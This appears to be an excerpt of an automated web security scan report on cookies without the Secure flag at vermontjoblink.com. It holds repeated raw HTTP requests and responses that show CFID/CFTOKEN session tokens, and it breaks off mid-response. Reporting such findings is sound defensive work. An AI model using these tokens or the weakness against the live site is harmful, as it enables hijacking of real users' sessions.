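The check is on the response header, not on the browser's behaviour: a cookie without Secure will be sent over plain HTTP regardless of how the page that set it was loaded, which is what the http://example.com:443/ trick in the issue background exploits. In ColdFusion 10 and later the CFID/CFTOKEN attributes can be set application-wide through the sessioncookie settings in Application.cfc; on older releases the flags have to be added when the cookies are re-issued.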
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/ HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:06:48 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Set-Cookie: TEST=1;path=/ Set-Cookie: SYSTRANLANGUAGE=en;path=/ Pragma: no-cache Expires: 06 Nov 1994 08:49:37 GMT Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/404/404_qry.cfm HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:07:01 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/customization/Vermont/documents/eeoislaw.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:53 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/customization/Vermont/documents/privacy.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:52 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/customization/Vermont/favicon.ico HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; TEST=1; SYSTRANLANGUAGE=en
Response
HTTP/1.1 302 Moved Temporarily Connection: close Date: Fri, 29 Apr 2011 21:06:59 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ location: /ada/404/404_qry.cfm Content-Type: text/html; charset=UTF-8
<!-- vermontjoblink --><!-- vjlpub --><!-- App list: (vjlpub) --><!-- Load Balancing is Off -->
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/default.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:49 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Pragma: no-cache Expires: 06 Nov 1994 08:49:37 GMT Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/etp/etp_newuser_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:58 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Pragma: no-cache Expires: {ts '2011-04-29 17:11:56'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/leavesite.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:51 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/mn_eligibility_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:53 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/mn_forgotpass.cfm HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontjoblink.com/ada/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:07:29 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/mn_login_fnc.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 29 Apr 2011 21:14:18 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
